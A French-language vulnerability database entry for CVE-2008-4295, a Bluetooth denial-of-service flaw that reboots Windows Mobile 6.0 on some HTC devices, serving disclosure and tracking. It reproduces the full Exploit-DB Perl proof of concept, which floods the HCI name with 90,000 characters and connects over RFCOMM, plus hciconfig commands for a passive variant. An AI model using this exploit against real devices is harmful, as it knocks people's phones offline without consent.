CVE-2008-4295 : Détail

CVE-2008-4295

A03-Injection
40.75%V4
Network
2008-09-26
22h00 +00:00
2017-09-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Microsoft Windows Mobile 6.0 on HTC Wiza 200 and HTC MDA 8125 devices does not properly handle the first attempt to establish a Bluetooth connection to a peer with a long name, which allows remote attackers to cause a denial of service (device reboot) by configuring a Bluetooth device with a long hci name and (1) connecting directly to the Windows Mobile system or (2) waiting for the Windows Mobile system to scan for nearby devices.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5.4 AV:N/AC:H/Au:N/C:N/I:N/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 6582

Date de publication : 2008-09-25 22h00 +00:00
Auteur : Julien Bedard
EDB Vérifié : Yes

#!/usr/bin/perl # # ----------WM6 remote overflow reboot PoC---------- # Simple exploit for remote rebooting a windows mobile device # Maybe we can use it for doing command execution, # I've not test it since the device is rebooting and do not dump a core # for further analysing. # # The bug is not realy in the long string name but when it's the first # time the wm6 device try to get a connection with too long name. # # There's two way to exploit this bug, this PoC show the first method # (direct connect to the device if we know the bdaddr) but you can # just wait for the device to search and overflow by itself when # seeing the hci name: # hciconfig <hci dev> name `perl -e 'print "A"x90000'` # hciconfig <hci dev> piscan # You just have to wait until the wm device search for bluetooth devices # in range and it will be overflowed # # *Tested on WM6 fully patched on [HTC wiza 200],[HTC Mda 8125] # (by Julien Bedard) # use Net::Bluetooth; $target=$ARGV[0]; $hci_dev=$ARGV[1]; $overflow="A" x 90000; $rfcomm_port="3"; if (@ARGV < 2) { die "Usage:\n ./wm6_dos.pl <target_mac> <hci_device>\n\n"; } # change this lame cmd ??? system("hciconfig $hci_dev name $overflow"); $over_conn = Net::Bluetooth->newsocket("RFCOMM"); print "socket error $!\n" unless(defined($over_conn)); $over_conn->connect($target, $rfcomm_port); # milw0rm.com [2008-09-26]

Products Mentioned

Configuraton 0

Microsoft>>Windows_mobile >> Version 6.0

Htc>>Mda >> Version 8125

    Htc>>Wiza >> Version 200

      Références

      http://secunia.com/advisories/32066
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://www.securityfocus.com/bid/31420
      Tags : vdb-entry, x_refsource_BID
      https://www.exploit-db.com/exploits/6582
      Tags : exploit, x_refsource_EXPLOIT-DB